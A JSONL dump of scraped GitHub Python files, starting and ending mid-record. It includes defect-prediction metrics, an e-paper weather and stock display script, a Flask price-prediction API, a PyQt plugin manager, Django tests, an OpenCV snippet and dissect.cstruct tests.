+ tn != 0 else 0\n recall = 1. * tp / (tp+fn) if tp + fn != 0 else 0\n g_score = (2 * recall * (1 - pf)) / (recall + 1 - pf) if recall + 1 - pf != 0 else 0\n return g_score\n\n\ndef get_popt20(data) -> float:\n \"\"\"\n Get popt20 score.\n\n :param data: Pandas DataFrame with data. Must contain columns \"bug\", \"loc\", and \"prediction\".\n :return: popt20 score\n \"\"\"\n def subtotal(x):\n xx = [0]\n for _, t in enumerate(x):\n xx += [xx[-1] + t]\n return xx[1:]\n\n def get_recall_(true):\n total_true = float(len([i for i in true if i == 1]))\n hit = 0.0\n recall = []\n for i, el in enumerate(true):\n if el == 1:\n hit += 1\n recall += [hit / total_true if total_true else 0.0]\n return recall\n\n data.sort_values(by=[\"bug\", \"loc\"], inplace=True)\n x_sum = float(sum(data['loc']))\n x = data['loc'].apply(lambda t: t / x_sum)\n xx = subtotal(x)\n\n # get AUC_optimal\n yy = get_recall_(data['bug'].values)\n xxx = [i for i in xx if i <= 0.2]\n yyy = yy[:len(xxx)]\n try:\n s_opt = round(auc(xxx, yyy), 3)\n except ValueError:\n s_opt = 0\n\n # get AUC_worst\n xx = subtotal(x[::-1])\n yy = get_recall_(data['bug'][::-1].values)\n xxx = [i for i in xx if i <= 0.2]\n yyy = yy[:len(xxx)]\n try:\n s_wst = round(auc(xxx, yyy), 3)\n except:\n s_wst = 0\n\n # get AUC_prediction\n data.sort_values(by=[\"prediction\", \"loc\"], ascending=[0, 1], inplace=True)\n x = data['loc'].apply(lambda t: t / x_sum)\n xx = subtotal(x)\n yy = get_recall_(data['bug'].values)\n xxx = [k for k in xx if k <= 0.2]\n yyy = yy[:len(xxx)]\n try:\n s_m = round(auc(xxx, yyy), 3)\n except ValueError:\n return 0\n\n popt = (s_m - s_wst) / (s_opt - s_wst)\n return round(popt, 3)\n","repo_name":"yrahul3910/raise","sub_path":"raise_utils/metrics/impl.py","file_name":"impl.py","file_ext":"py","file_size_in_byte":6080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22284175474","text":"#!/usr/bin/env python\n#encoding: utf-8\nimport sys\nimport os\nimport time\nimport datetime\nimport json\nimport requests\nimport re\nimport struct\nfrom StringIO import StringIO\nfrom PIL import Image, ImageDraw, ImageFont\n\ncolor_white = (255, 255, 255)\ncolor_black = (0, 0, 0)\ncolor_red = (227, 178, 4)\n\nimage_width = 640\nimage_height = 384\n\nfont_path = os.path.dirname(os.path.abspath(__file__)) + '/font.ttc'\n\ndef current_datetime():\n m = ['一', '二', '三', '四', '五', '六', '日']\n n = datetime.datetime.now()\n return (n.strftime('%m-%d %H:%M 星期') + m[n.weekday()]).decode('utf-8')\n\ndef fetch_finance():\n url = 'https://hq.sinajs.cn/rn=%d&list=gb_dji,gb_ixic,gb_inx,s_sh000001,s_sz399001,USDCNY' % int(time.time())\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',\n }\n r = requests.get(url, headers=headers)\n text = r.text\n matches = re.findall(r'var ([^=]+)=\"([^\"]+)\"', text, re.M)\n\n result = {}\n for v in matches:\n result[v[0]] = v[1].split(',')\n\n return result\n\ndef draw_finance(draw, item, pos):\n font = ImageFont.truetype(font_path, 20)\n\n left = pos[0]\n top = pos[1] + 10\n text = item[0]\n draw.text((left, top), text, font=font, fill=color_black)\n w, h = draw.textsize(text, font=font)\n w2, h2 = draw.textsize(u'四个字符', font=font)\n if w < w2:\n w = w2\n\n left += w + 10\n text = u'%.2f' % item[1]\n w, h = draw.textsize(text, font=font)\n draw.text((left, top), text, font=font, fill=color_black)\n\n bg_color = None\n txt_color = None\n left += w + 10\n\n if item[2] > 0:\n bg_color = color_red\n txt_color = color_black\n text = u'+%.2f%%' % item[2]\n else:\n bg_color = color_black\n txt_color = color_white\n text = u'-%f%' % item[2]\n\n w, h = draw.textsize(text, font=font)\n draw.rectangle([left-2, top-2, left + w + 2, top + h + 2], fill=bg_color)\n draw.text((left, top), text, font=font, fill=txt_color)\n\ndef load_icon(url):\n r = requests.get(url)\n png = Image.open(StringIO(r.content))\n background = Image.new(\"RGB\", png.size, (255, 255, 255))\n background.paste(png, mask=png.split()[3]) # 3 is the alpha channel\n return background\n\ndef draw_weather(image, draw, day, pos, width):\n is_today = datetime.datetime.now().strftime('%m-%d') == day['date']\n\n font = ImageFont.truetype(font_path, 24)\n\n left = pos[0]\n top = pos[1] + 10\n text = day['date']\n w, h = draw.textsize(text, font=font)\n draw.text(((width-w)/2 + left, top), text, font=font, fill=color_black)\n\n top += h + 5\n text = day['weekday']\n w, h = draw.textsize(text, font=font)\n draw.text(((width-w)/2 + left, top), text, font=font, fill=color_black)\n\n top += h + 5\n if is_today:\n icon = load_icon(day['day']['icon'])\n icon_margin = (width - icon.size[0])/2\n image.paste(icon, (icon_margin + left, top))\n else:\n icon = load_icon(day['day']['icon'])\n icon_margin = width/2 - icon.size[0] - 10\n image.paste(icon, (icon_margin + left, top))\n\n icon = load_icon(day['night']['icon'])\n image.paste(icon, (left + width/2 + 10, top))\n\n font = ImageFont.truetype(font_path, 20)\n text = day['day']['temp'] + u'℃'\n if not is_today:\n text += ' / ' + day['night']['temp'] + u'℃'\n top += h + 30\n w, h = draw.textsize(text, font=font)\n draw.text(((width-w)/2 + left, top), text, font=font, fill=color_black)\n\n font = ImageFont.truetype(font_path, 16)\n text = day['wind']\n top += h + 5\n w, h = draw.textsize(text, font=font)\n draw.text(((width-w)/2 + left, top), text, font=font, fill=color_black)\n\n font = ImageFont.truetype(font_path, 24)\n text = day['aq'] + u' ' + day['aq_desc']\n top += h + 5\n w, h = draw.textsize(text, font=font)\n draw.text(((width-w)/2 + left, top), text, font=font, fill=color_black)\n\n\ndef draw_board():\n image = Image.new('RGB', (image_width, image_height), color_white)\n draw = ImageDraw.Draw(image)\n\n font = ImageFont.truetype(font_path, 60)\n\n line = current_datetime()\n w, h = draw.textsize(line, font=font)\n draw.text(((image_width-w)/2,10), line, font=font, fill=color_black)\n\n draw.line([(0, 80),(image_width, 80)], fill=color_black, width=1)\n\n json_path = os.path.dirname(os.path.abspath(__file__)) + '/weather.json'\n weather_info = json.load(open(json_path))\n weather_info['days'][0]['day']['temp'] = weather_info['current_temp']\n weather_info['days'][0]['wind'] = weather_info['current_wind']\n weather_info['days'][0]['aq'] = weather_info['current_aq']\n weather_info['days'][0]['aq_desc'] = weather_info['current_aq_desc']\n\n for i in xrange(4):\n width = image_width / 4\n draw_weather(image, draw, weather_info['days'][i], (0 + i * width, 80), width)\n if i != 3:\n draw.line([((i+1)*width, 80),((i+1)*width, 80+200)], fill=color_black, width=1)\n\n draw.line([(0, 80+200),(image_width, 80+200)], fill=color_black, width=1)\n\n finance = fetch_finance()\n draw_finance(draw, (u'道琼斯', float(finance['hq_str_gb_dji'][1]), float(finance['hq_str_gb_dji'][2])), (20, 280))\n draw_finance(draw, (u'纳斯达克', float(finance['hq_str_gb_ixic'][1]), float(finance['hq_str_gb_ixic'][2])), (image_width/2, 280))\n\n draw_finance(draw, (u'上证指数', float(finance['hq_str_s_sh000001'][1]), float(finance['hq_str_s_sh000001'][3])), (20, 310))\n draw_finance(draw, (u'深证成指', float(finance['hq_str_s_sz399001'][1]), float(finance['hq_str_s_sz399001'][3])), (image_width/2, 310))\n\n c = float(finance['hq_str_USDCNY'][8])\n o = float(finance['hq_str_USDCNY'][3])\n draw_finance(draw, (u'美元兑人民币', c, (c-o)/o*100), (20, 340))\n\n return image\n\ndef convert_image(im, output_path):\n output_fp = open(output_path, \"w\")\n\n w, h = im.size\n size = w*h\n\n i = 0\n while i < size:\n b = 0x00\n\n for j in xrange(4):\n idx = i + j\n if idx < size:\n px = im.getpixel((idx%w, idx/w))\n if px[0] > 230 and px[1] > 230 and px[2] > 230: #white\n b |= 0x01 << ((3 - j)*2)\n elif px[0] > 200:\n b |= 0x02 << ((3 - j)*2)\n else:\n break\n\n output_fp.write(struct.pack(\"B\", b))\n\n i += 4\n\n\n\nif __name__ == '__main__':\n image = draw_board()\n #image.save(\"./board.bmp\")\n convert_image(image, sys.argv[1])\n","repo_name":"emptyhua/epaper_board","sub_path":"draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":6573,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"35834921429","text":"import os\n\nfrom dotenv import load_dotenv\n\nfrom bot_app import screenshots\n\ndotenv_path = os.path.join(os.path.dirname(os.path.dirname(__file__)), '.env')\n\nif os.path.exists(dotenv_path):\n load_dotenv(dotenv_path)\n\nBOT_TOKEN = os.environ.get('BOT_TOKEN', '')\n\nSPLASH_PORT = os.environ.get('SPLASH_PORT', '8050')\n\nSAVE_PATH = screenshots.get_dir_path()\n\nFULL_PAGE = 1\n","repo_name":"Iftor/screenshoter-bot","sub_path":"bot_app/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"538702366","text":"# Importando as bibliotecas\nfrom flask import Flask, request, render_template\nfrom flask_restful import Api\nfrom joblib import load\n\n# Iniciando o Flask e especificando o repositorio dos templates\napp = Flask(__name__, template_folder=\"template\")\n\nimport preprocessamento\n\n# Iniciando a API\napi = Api(app)\n\n# Carregando os modelos treinados\nmodelo_aluguel = load('modelo_alugueis.joblib')\nmodelo_venda = load('modelo_vendas.joblib')\n\n# Rota padrão para home\n@app.route('/')\ndef home():\n return render_template('home.html') # Rendezirar o template\n\n# Rota 'predict' aceita GET request\n@app.route('/predict', methods=['GET'])\ndef predict_price():\n try:\n negotiation_type = int(request.args.get('negotiation_type')) # Obter os parâmetros para Negotiation_Type\n condo = int(request.args.get('condo')) # Obter os parâmetros para Condo\n size = int(request.args.get('size')) # Obter os parâmetros para Size\n rooms = int(request.args.get('rooms')) # Obter os parâmetros para Rooms\n toilets = int(request.args.get('toilets')) # Obter os parâmetros para Toilets\n suites = int(request.args.get('suites')) # Obter os parâmetros para Suites\n parking = int(request.args.get('parking')) # Obter os parâmetros para Parking\n elevator = int(request.args.get('elevator')) # Obter os parâmetros para Elevator\n furnished = int(request.args.get('furnished')) # Obter os parâmetros para Furnished\n swimming_pool = int(request.args.get('swimming_pool')) # Obter os parâmetros para Swimming_Pool\n new = int(request.args.get('new')) # Obter os parâmetros para New\n bairro = request.args.get('bairro') # Obter os parâmetros para Bairro\n\n bairros_sem_aluguel = ['District_Perus', 'District_São Domingos']\n\n # Separando os modelos para aluguel e venda\n if negotiation_type == 0:\n if bairro in bairros_sem_aluguel:\n previsao = 'O bairro informado não possui nenhuma informação no banco de dados referente ao preço de ' \\\n 'aluguel.'\n return render_template('output2.html', previsao=previsao)\n else:\n # Obtendo a previsão\n previsao = modelo_aluguel.predict(preprocessamento.tratamento(negotiation_type, condo, size, rooms,\n toilets, suites, parking, elevator,\n furnished, swimming_pool, new, bairro))\n # Exibindo a previsão na página web output\n return render_template('output.html', previsao=previsao)\n\n elif negotiation_type == 1:\n # Obtendo a previsão\n previsao = round(modelo_venda.predict(preprocessamento.tratamento(negotiation_type, condo, size, rooms,\n toilets, suites, parking, elevator,\n furnished, swimming_pool, new, bairro)))\n # Exibindo a previsão na página web output\n return render_template('output.html', previsao=previsao)\n except:\n 'Error'\n\n# Executar o servidor Flask\nif(__name__== '__main__'):\n app.run()\n","repo_name":"octavianosilva/API_Apartamentos_SP","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3329,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34838305943","text":"\"\"\" A simple web browser \"\"\"\r\n\r\nimport socket\r\n# print(help(socket))\r\n\r\nmy_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nmy_sock.connect((\"data.pr4e.org\", 80))\r\n\r\nreq = \"GET http://data.pr4e.org/romeo.txt HTTP/1.0\\r\\n\\r\\n\"\r\nreq_encoded = req.encode()\r\nmy_sock.send(req_encoded)\r\n\r\nwhile True:\r\n data = my_sock.recv(512)\r\n if len(data) < 1:\r\n break\r\n print(data.decode())\r\n\r\nmy_sock.close()\r\n","repo_name":"danielOuattara/Python_For_EveryBody_py4e_Charles_Severance","sub_path":"13_Python_Network/script_03_using_http.py","file_name":"script_03_using_http.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"31849950045","text":"import os\nimport shutil\nimport sys\n\nfrom PyQt6 import QtWidgets, QtGui, QtCore\nfrom pathlib import Path\nfrom .control_plugin_collection import PluginCollection\n\n\nclass PluginManager(object):\n def __init__(self, main_control):\n super().__init__()\n self.main_control = main_control\n self.plugin = PluginCollection(\"plugins\")\n self.apps_activated = None\n self.index = None\n self.init_available_plugin()\n self.connect_to_event()\n\n def connect_to_event(self):\n self.main_control.ui.add_plugins_button.clicked.connect(self.install_new_plugin)\n self.main_control.ui.delete_plugins_button.clicked.connect(self.action_delete_apps)\n self.main_control.ui.close_plugin_button.clicked.connect(self.main_control.back_to_home)\n self.main_control.ui.help_plugins_button.clicked.connect(self.help_menu_plugin)\n\n def init_available_plugin(self):\n for i in range(self.main_control.ui.layout_application.count()):\n self.main_control.ui.layout_application.itemAt(i).widget().close()\n\n for i in range(len(self.plugin.name_application)):\n icon = self.plugin.get_icon_(i)\n button = self.add_btn_apps_plugin(icon, self.plugin.name_application[i])\n button.clicked.connect(self.open_plugin_apps)\n self.main_control.ui.layout_application.addWidget(button)\n\n def install_new_plugin(self):\n options = QtWidgets.QFileDialog.Option.DontUseNativeDialog\n dir_plugin = QtWidgets.QFileDialog.getExistingDirectory(None,\n 'Select Application Folder', \"../plugin_store\", options)\n if dir_plugin:\n original = dir_plugin\n name_plug = os.path.basename(os.path.normpath(original))\n path_file = os.path.dirname(os.path.realpath(__file__))\n target = path_file + '/plugins/'\n name_exist = Path(target + name_plug)\n if name_exist.exists():\n QtWidgets.QMessageBox.warning(None, \"Warning !!\", \"Plugins already exist!!\")\n else:\n listApp = self.plugin.name_application\n self.main_control.model.copy_directory(original, target)\n self.plugin.reload_plugins()\n newList = self.plugin.name_application\n name = [item for item in newList if item not in listApp]\n\n def listToString(listIn):\n return \" \".join(listIn)\n\n index = newList.index(listToString(name))\n icon = self.plugin.get_icon_(index)\n button = self.add_btn_apps_plugin(icon, self.plugin.name_application[index])\n button.clicked.connect(self.open_plugin_apps)\n self.main_control.ui.layout_application.addWidget(button)\n self.pop_up_message_box(\"Plugins was successfully added!!\")\n\n def refresh_theme_widget(self):\n if self.index is not None:\n self.plugin.change_theme(self.index)\n\n def open_plugin_apps(self):\n button = self.main_control.sender()\n index = self.plugin.name_application.index(button.objectName())\n if index != self.index:\n self.index = self.plugin.name_application.index(button.objectName())\n self.main_control.ui.delete_plugins_button.show()\n self.main_control.ui.close_plugin_button.show()\n for i in range(self.main_control.ui.layout_plugin.count()):\n self.main_control.ui.layout_plugin.itemAt(i).widget().close()\n\n widget = self.plugin.get_widget(self.index, self.main_control.model)\n self.main_control.ui.layout_plugin.addWidget(widget)\n self.main_control.ui.widget_container_content.setCurrentIndex(1)\n self.main_control.ui.frame_btn_moilapp.hide()\n self.main_control.ui.frame_button_view.hide()\n self.apps_activated = button.objectName()\n\n @classmethod\n def add_btn_apps_plugin(cls, icon_, name):\n button = QtWidgets.QPushButton()\n button.setObjectName(name)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Policy.Minimum, QtWidgets.QSizePolicy.Policy.Expanding)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(button.sizePolicy().hasHeightForWidth())\n button.setSizePolicy(sizePolicy)\n button.setMinimumSize(QtCore.QSize(40, 25))\n button.setMaximumSize(QtCore.QSize(35, 16777215))\n if icon_ is not None:\n icon = QtGui.QIcon(icon_)\n button.setIcon(icon)\n button.setIconSize(QtCore.QSize(30, 30))\n return button\n\n def action_delete_apps(self):\n index = self.plugin.name_application.index(self.apps_activated)\n self.delete_apps(index)\n\n def delete_apps(self, index):\n \"\"\"\n Delete selected application from the list.\n\n Returns:\n None.\n \"\"\"\n name = self.plugin.name_application[index]\n path = self.plugin.path_folder[index]\n path = path.split(\".\")[1]\n\n path_file = os.path.dirname(os.path.realpath(__file__))\n path = path_file + '/plugins/'+path\n\n reply = QtWidgets.QMessageBox.question(None, 'Message',\n \"Are you sure want to delete \\n\" +\n name + \" application ?\\n\",\n QtWidgets.QMessageBox.StandardButton.Yes |\n QtWidgets.QMessageBox.StandardButton.No,\n QtWidgets.QMessageBox.StandardButton.No)\n\n if reply == QtWidgets.QMessageBox.StandardButton.Yes:\n shutil.rmtree(path, ignore_errors=True)\n self.plugin.reload_plugins()\n self.init_available_plugin()\n self.pop_up_message_box(\"Plugins was successfully deleted !!\")\n self.main_control.back_to_home()\n\n def help_menu_plugin(self):\n if self.main_control.ui.widget_container_content.currentIndex() == 0:\n message = \"Help menu plugin under development \\n\" \\\n \"we Will inform you after finish!!\\n\"\n\n else:\n print(self.plugin.get_description(self.index))\n message = \"Help menu plugin under development \\n\" \\\n \"we Will inform you after finish!!\\n\\n\" \\\n \"Note App: \" + self.plugin.get_description(self.index)\n self.pop_up_message_box(message)\n\n @classmethod\n def pop_up_message_box(cls, message=\"\"):\n msg = QtWidgets.QMessageBox()\n msg.setIcon(QtWidgets.QMessageBox.Icon.Information)\n msg.setStyleSheet(\"font-family: Segoe UI; font-size:14px;\")\n msg.setWindowTitle(\"Information\")\n # setting message for Message Box\n msg.setText(\"Information !! \\n\\n\" + message)\n msg.setStandardButtons(QtWidgets.QMessageBox.StandardButton.Ok)\n msg.show()\n\n def close_msg():\n msg.done(0)\n\n QtCore.QTimer.singleShot(6000, close_msg)\n","repo_name":"Herusyahputra/PycharmProjects","sub_path":"moilapp-develop_anto/src/controllers/control_plugin_manager.py","file_name":"control_plugin_manager.py","file_ext":"py","file_size_in_byte":7154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32523824634","text":"from django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom mixer.backend.django import mixer\nimport json\nfrom accomplishment.forms import AccomplishmentFormMixin\nfrom accomplishment.models import Accomplishment, UserAccomplishment\nfrom django.urls import reverse_lazy\nfrom subject_area.models import SubjectArea, Category\nfrom rest_framework.authtoken.models import Token\n\n\nclass AccomplishmentTestCase(TestCase):\n def setUp(self):\n self.session_user = mixer.blend(User)\n self.client.force_login(self.session_user)\n self.token = Token.objects.create(user=self.session_user).key\n self.client.defaults['HTTP_AUTHORIZATION'] = 'Token ' + self.token\n profile = self.session_user.profile\n profile.device_token = \"somedevicetoken\"\n profile.save()\n\n def test_accomplishment_creation(self):\n accomplishments_count = Accomplishment.objects.count()\n subject_areas = [instance for instance in mixer.cycle(2).blend(SubjectArea)]\n categories = [instance for instance in mixer.cycle(2).blend(Category)]\n\n category_ids = [category.id for category in categories]\n\n subject_areas[0].category_set.add(categories[0])\n subject_areas[1].category_set.add(categories[1])\n\n users = mixer.cycle(2).blend(User)\n\n i = 0\n\n for user in users:\n print(f\"whaaat: {subject_areas[i].id}\")\n user.profile.subject_area = subject_areas[i]\n user.save()\n user.profile.save()\n i += 1\n\n print(f\"hey 2: {user.profile.subject_area}\")\n\n with mixer.ctx(commit=False):\n data = mixer.blend(Accomplishment, name=\"test\", full_score=100).__dict__\n data = {**data, \"categories\": category_ids}\n\n response = self.client.post(reverse_lazy(\"accomplishment:list\"), data)\n print(response.content)\n\n accomplishment = Accomplishment.objects.first()\n\n print(f\"yeso: {SubjectArea.objects.all()}\")\n print(f\"yeso 2: {Category.objects.all()}\")\n print(f\"yeso 3: {User.objects.all()}\")\n print(f\"yeso 4: {UserAccomplishment.objects.all()}\")\n\n self.assertEqual(response.status_code, 302)\n self.assertEqual(Accomplishment.objects.count(), accomplishments_count+1)\n self.assertEqual(len(users), accomplishment.users.all().count())\n # self.assertEqual(len(subject_areas), accomplishment.subject_areas.all().count())\n\n users_after_accomplishment_creation = mixer.cycle(2).blend(User)\n\n subject_area_after_accomplishment_creation = mixer.blend(SubjectArea)\n\n category_after_accomplishment_creation = mixer.blend(\n Category, subject_area=subject_area_after_accomplishment_creation)\n\n accomplishment.categories.add(category_after_accomplishment_creation)\n\n i = 0\n for user in users_after_accomplishment_creation:\n user.profile.subject_area = subject_area_after_accomplishment_creation\n user.save()\n i += 1\n\n accomplishment.refresh_from_db()\n\n self.assertEqual(len(users)+len(users_after_accomplishment_creation), accomplishment.users.all().count())\n\n def test_accomplishment_edition(self):\n full_score = 3\n instance = self.create_accomplishment(full_score=full_score)\n subject_areas = instance.subject_areas.all()\n categories = instance.categories.all()\n accomplishment_users = set(instance.users.values_list(\"pk\", flat=True))\n\n with mixer.ctx(commit=False):\n new_data = mixer.blend(Accomplishment).__dict__\n new_data = {**new_data, \"categories\": [category.pk for category in categories]}\n\n response = self.client.post(reverse_lazy(\"accomplishment:edit\", kwargs={\"pk\": instance.pk}), data=new_data)\n self.assertEqual(response.status_code, 302)\n\n instance.refresh_from_db()\n\n self.assertEqual(instance.name, new_data.get(\"name\"))\n self.assertEqual(instance.categories.all().count(), categories.count())\n self.assertEqual(set(instance.users.values_list(\"pk\", flat=True)), accomplishment_users)\n\n # test changing of subject_areas\n\n new_subject_areas = [subject_area for subject_area in mixer.cycle(3).blend(SubjectArea)]\n\n i = 0\n\n new_categories = [category for category in mixer.cycle(3).blend(Category)]\n\n for new_subject_area in new_subject_areas:\n new_categories[i].subject_area = new_subject_area\n new_categories[i].save()\n\n new_data[\"categories\"] = [new_category.pk for new_category in new_categories]\n\n new_users = mixer.cycle(3).blend(User)\n\n i = 0\n for user in new_users:\n user.profile.subject_area = new_subject_areas[i]\n user.save()\n user.profile.save()\n i += 1\n\n response = self.client.post(reverse_lazy(\"accomplishment:edit\", kwargs={\"pk\": instance.pk}), data=new_data)\n self.assertEqual(response.status_code, 302)\n print(f\"?????? {accomplishment_users}\")\n old_user = next(iter(accomplishment_users))\n response = self.client.get(reverse_lazy(\"api_accomplishment:accomplishment-detail\",\n kwargs={\"accomplishment_id\": instance.pk,\n \"user_id\": old_user}))\n\n # hier darf der Nutzer nicht mehr auftauchen, da er nicht mehr zur Fachrichtung dazu gehört\n\n self.assertEqual(response.status_code, 404, f\"{json.loads(response.content)}\")\n\n instance.refresh_from_db()\n\n self.assertEqual(len(new_subject_areas), SubjectArea.objects.filter(\n category__in=instance.categories.all()).count())\n self.assertNotEqual(set(instance.users.values_list(\"pk\", flat=True)), accomplishment_users)\n\n # example user must be user from subject_area because non-subject-areas aren't listed on endpoint\n\n example_user = instance.categories.first().subject_area.profiles.first().user\n\n for i in range(0, full_score):\n response = self.client.put(reverse_lazy(\"api_accomplishment:accomplishment-incrementation\",\n kwargs={\"user_id\": example_user.id, \"accomplishment_id\": instance.id})\n )\n self.assertEqual(response.status_code, 200)\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(json.loads(response.content).get(\"score\"), full_score)\n instance.refresh_from_db()\n\n new_full_score = 1\n new_data[\"full_score\"] = new_full_score\n\n response = self.client.post(reverse_lazy(\"accomplishment:edit\", kwargs={\"pk\": instance.pk}), data=new_data)\n\n self.assertEqual(response.status_code, 302)\n\n instance.refresh_from_db()\n\n self.assertEqual(instance.full_score, new_full_score)\n\n def test_incrementation_and_decrementation_of_users_accomplishment_score(self):\n full_score = 3\n accomplishment = self.create_accomplishment(full_score=full_score)\n user = accomplishment.users.first()\n\n response, json_response = self.fetch_user_accomplishment(user.id, accomplishment.id)\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(json_response.get(\"score\"), 0)\n\n for i in range(0, full_score):\n self.client.put(reverse_lazy(\"api_accomplishment:accomplishment-incrementation\",\n kwargs={\"user_id\": user.id, \"accomplishment_id\": accomplishment.id})\n )\n response, json_response = self.fetch_user_accomplishment(user.id, accomplishment.id)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(json_response.get(\"score\"), full_score)\n\n response = self.client.put(reverse_lazy(\"api_accomplishment:accomplishment-incrementation\",\n kwargs={\"user_id\": user.id, \"accomplishment_id\": accomplishment.id})\n )\n\n self.assertEqual(response.status_code, 400)\n\n for i in range(0, full_score):\n self.client.put(reverse_lazy(\"api_accomplishment:accomplishment-decrementation\",\n kwargs={\"user_id\": user.id, \"accomplishment_id\": accomplishment.id})\n )\n\n response, json_response = self.fetch_user_accomplishment(user.id, accomplishment.id)\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(json_response.get(\"score\"), 0)\n\n response = self.client.put(reverse_lazy(\"api_accomplishment:accomplishment-decrementation\",\n kwargs={\"user_id\": user.id, \"accomplishment_id\": accomplishment.id})\n )\n\n self.assertEqual(response.status_code, 400)\n\n def create_accomplishment(self, full_score=1):\n subject_areas = [instance for instance in mixer.cycle(2).blend(SubjectArea)]\n categories = [instance for instance in mixer.cycle(2).blend(Category)]\n\n category_ids = [instance.pk for instance in categories]\n\n categories[0].subject_area = subject_areas[0]\n categories[1].subject_area = subject_areas[1]\n\n categories[0].save()\n categories[1].save()\n\n users = mixer.cycle(2).blend(User)\n\n i = 0\n for user in users:\n user.profile.subject_area = subject_areas[i]\n user.save()\n user.profile.save()\n i += 1\n\n with mixer.ctx(commit=False):\n data = mixer.blend(Accomplishment, full_score=full_score).__dict__\n data = {**data, \"categories\": category_ids}\n\n form = AccomplishmentFormMixin(data=data)\n instance = form.save()\n print(f\"....----....----.... {instance.users.all()}\")\n return instance\n\n def fetch_user_accomplishment(self, user_id, accomplishment_id):\n response = self.client.get(\n reverse_lazy(\"api_accomplishment:accomplishment-detail\",\n kwargs={\"user_id\": user_id, \"accomplishment_id\": accomplishment_id}))\n json_response = json.loads(response.content)\n return response, json_response\n\n def test_accomplishment_badges(self):\n self.assertEqual(self.session_user.profile.accomplishment_badges, 0)\n subject_area = mixer.blend(SubjectArea)\n categories = [instance for instance in mixer.cycle(2).blend(Category)]\n\n category_ids = [category.id for category in categories]\n\n subject_area.category_set.add(categories[0])\n subject_area.category_set.add(categories[1])\n\n profile = self.session_user.profile\n profile.subject_area = subject_area\n profile.save()\n\n with mixer.ctx(commit=False):\n data = mixer.blend(Accomplishment, name=mixer.RANDOM, full_score=100).__dict__\n data = {**data, \"categories\": category_ids}\n\n response = self.client.post(reverse_lazy(\"accomplishment:list\"), data)\n self.assertEqual(response.status_code, 302)\n self.session_user.profile.refresh_from_db()\n self.assertEqual(self.session_user.profile.accomplishment_badges, 1)\n","repo_name":"memobijou/clinic-app","sub_path":"accomplishment/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":11201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"20748457251","text":"import cv2\nimport numpy as np\n\n\nimg_dir = 'C:\\\\D\\\\testImgs\\\\'\nimg = cv2.imread(img_dir + 'aa.jpg')\nkernel = np.array([[0.299, 0.587, 0.114], [- 0.1687, 0.3313, 0.5], [0.5, 0.4187, 0.0813]])\n# 就是矩阵相乘:yuv = kernel * img, 针对每一个像素的rgb\nyuv = cv2.transform(img, kernel)\n\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\ncv2.imshow('original', img)\ncv2.imshow('y', yuv[:, :, 0])\ncv2.imshow('gray', gray)\n\ncv2.waitKey()\ncv2.destroyAllWindows()\n","repo_name":"kingtub/OpencvExercise","sub_path":"opencv-python-book/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73797074284","text":"import pytest\nfrom dissect import cstruct\n\nfrom dissect.cstruct.types import PackedType\n\nfrom .utils import verify_compiled\n\n\ndef test_packedtype_float():\n cs = cstruct.cstruct()\n\n assert cs.float16.dumps(420.69) == b\"\\x93^\"\n assert cs.float.dumps(31337.6969) == b\"e\\xd3\\xf4F\"\n assert cs.float16.reads(b\"\\x69\\x69\") == 2770.0\n assert cs.float.reads(b\"M0MS\") == 881278648320.0\n\n\ndef test_packedtype_float_struct(compiled):\n cdef = \"\"\"\n struct test {\n float16 a;\n float b;\n };\n \"\"\"\n cs = cstruct.cstruct()\n cs.load(cdef, compiled=compiled)\n\n assert verify_compiled(cs.test, compiled)\n\n buf = b\"69\\xb1U$G\"\n obj = cs.test(buf)\n\n assert obj.a == 0.6513671875\n assert obj.b == 42069.69140625\n\n\ndef test_packedtype_float_struct_be(compiled):\n cdef = \"\"\"\n struct test {\n float16 a;\n float b;\n };\n \"\"\"\n cs = cstruct.cstruct()\n cs.load(cdef, compiled=compiled)\n cs.endian = \">\"\n\n assert verify_compiled(cs.test, compiled)\n\n buf = b\"69G$U\\xb1\"\n obj = cs.test(buf)\n print(obj)\n\n assert obj.a == 0.388916015625\n assert obj.b == 42069.69140625\n\n\ndef test_packedtype_range():\n cs = cstruct.cstruct()\n float16 = PackedType(cs, \"float16\", 2, \"e\")\n float16.dumps(-65519.999999999996)\n float16.dumps(65519.999999999996)\n with pytest.raises(OverflowError):\n float16.dumps(-65519.999999999997)\n with pytest.raises(OverflowError):\n float16.dumps(65519.999999999997)\n","repo_name":"fox-it/dissect.cstruct","sub_path":"tests/test_packedtype.py","file_name":"test_packedtype.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"19"} +{"seq_id":"8451598305","text":"from collections import OrderedDict\nimport copy\nfrom 